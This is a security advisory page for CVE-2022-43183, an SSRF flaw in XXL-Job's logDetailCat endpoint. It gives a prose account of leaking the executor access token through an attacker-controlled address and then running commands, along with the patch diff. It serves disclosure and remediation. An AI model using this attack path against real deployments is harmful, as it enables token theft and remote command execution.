VYPR
← All advisories
High severityNVD Advisory· Published Nov 17, 2022· Updated Apr 29, 2025

CVE-2022-43183

CVE-2022-43183

Description

XXL-Job before 2.3.1 has an SSRF vulnerability in the /logDetailCat endpoint that can leak the access token and allow arbitrary command execution.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

XXL-Job before 2.3.1 has an SSRF vulnerability in the /logDetailCat endpoint that can leak the access token and allow arbitrary command execution.

The vulnerability resides in the JobLogController.java file of XXL-Job's admin module. The logDetailCat method accepts an executorAddress parameter from the request and directly uses it to send a log query request without validation. This request includes the XXL-JOB-ACCESS-TOKEN header, which is the authentication token for executor communication [2][3].

An attacker with a low-privilege user account on the XXL-Job admin panel can exploit this by calling the /logDetailCat endpoint with a crafted executorAddress pointing to a server they control. The admin backend will then send a request containing the access token to the attacker's server, thereby leaking the token [3].

With the obtained XXL-JOB-ACCESS-TOKEN, the attacker can impersonate the admin to any executor, trigger arbitrary tasks, and execute arbitrary commands on the executor servers. This can lead to full compromise of the executor machines and potentially the entire distributed scheduling infrastructure [3].

The issue is fixed in version 2.4.0. The patch removes the executorAddress parameter from logDetailCat and instead loads the executor address from the database based on the log ID, preventing SSRF [2]. Users should upgrade to the latest version to mitigate the risk.

References
  1. "CVE-2022-43183" SSRF漏洞修复。 · xuxueli/xxl-job@9293c61
  2. xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
com.xuxueli:xxl-job-coreMaven
< 2.4.02.4.0

Affected products

2

Patches

1
9293c61ca0a8

"CVE-2022-43183" SSRF漏洞修复。

https://github.com/xuxueli/xxl-jobxuxueliMar 23, 2023via ghsa
commit
4 files changed · +13 12
  • doc/XXL-JOB官方文档.md+2 1 modified
    @@ -2304,7 +2304,8 @@ public void execute() {
 ### 7.33 版本 v2.4.0 Release Notes[规划中]
 - 1、【优化】执行器任务Bean扫描逻辑优化:解决懒加载注解失效问题。
 - 2、【优化】多个项目依赖升级至较新稳定版本,涉及netty、groovy、spring、springboot、mybatis等;
-- 3、【修复】"CVE-2022-36157"授权漏洞修复。 
+- 3、【修复】"CVE-2022-36157" 授权漏洞修复。 
+- 4、【修复】"CVE-2022-43183" SSRF漏洞修复。
 
 
 ### 7.34 新版本规划 [规划中]
  • xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java+11 7 modified
    @@ -1,7 +1,7 @@
 package com.xxl.job.admin.controller;

 

-import com.xxl.job.admin.core.exception.XxlJobException;

 import com.xxl.job.admin.core.complete.XxlJobCompleter;

+import com.xxl.job.admin.core.exception.XxlJobException;

 import com.xxl.job.admin.core.model.XxlJobGroup;

 import com.xxl.job.admin.core.model.XxlJobInfo;

 import com.xxl.job.admin.core.model.XxlJobLog;

@@ -129,22 +129,26 @@ public String logDetailPage(int id, Model model){
 

         model.addAttribute("triggerCode", jobLog.getTriggerCode());

         model.addAttribute("handleCode", jobLog.getHandleCode());

-        model.addAttribute("executorAddress", jobLog.getExecutorAddress());

-        model.addAttribute("triggerTime", jobLog.getTriggerTime().getTime());

         model.addAttribute("logId", jobLog.getId());

 		return "joblog/joblog.detail";

 	}

 

 	@RequestMapping("/logDetailCat")

 	@ResponseBody

-	public ReturnT<LogResult> logDetailCat(String executorAddress, long triggerTime, long logId, int fromLineNum){

+	public ReturnT<LogResult> logDetailCat(long logId, int fromLineNum){

 		try {

-			ExecutorBiz executorBiz = XxlJobScheduler.getExecutorBiz(executorAddress);

-			ReturnT<LogResult> logResult = executorBiz.log(new LogParam(triggerTime, logId, fromLineNum));

+			// valid

+			XxlJobLog jobLog = xxlJobLogDao.load(logId);	// todo, need to improve performance

+			if (jobLog == null) {

+				return new ReturnT<LogResult>(ReturnT.FAIL_CODE, I18nUtil.getString("joblog_logid_unvalid"));

+			}

+

+			// log cat

+			ExecutorBiz executorBiz = XxlJobScheduler.getExecutorBiz(jobLog.getExecutorAddress());

+			ReturnT<LogResult> logResult = executorBiz.log(new LogParam(jobLog.getTriggerTime().getTime(), logId, fromLineNum));

 

 			// is end

             if (logResult.getContent()!=null && logResult.getContent().getFromLineNum() > logResult.getContent().getToLineNum()) {

-                XxlJobLog jobLog = xxlJobLogDao.load(logId);

                 if (jobLog.getHandleCode() > 0) {

                     logResult.getContent().setEnd(true);

                 }
  • xxl-job-admin/src/main/resources/static/js/joblog.detail.1.js+0 2 modified
    @@ -25,8 +25,6 @@ $(function() {
             async: false,   // sync, make log ordered
             url : base_url + '/joblog/logDetailCat',
             data : {
-                "executorAddress":executorAddress,
-                "triggerTime":triggerTime,
                 "logId":logId,
                 "fromLineNum":fromLineNum
             },
  • xxl-job-admin/src/main/resources/templates/joblog/joblog.detail.ftl+0 2 modified
    @@ -62,8 +62,6 @@
     // 参数
     var triggerCode = '${triggerCode}';
     var handleCode = '${handleCode}';
-    var executorAddress = '${executorAddress!}';
-    var triggerTime = '${triggerTime?c}';
     var logId = '${logId}';
 </script>
 <script src="${request.contextPath}/static/js/joblog.detail.1.js"></script>

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.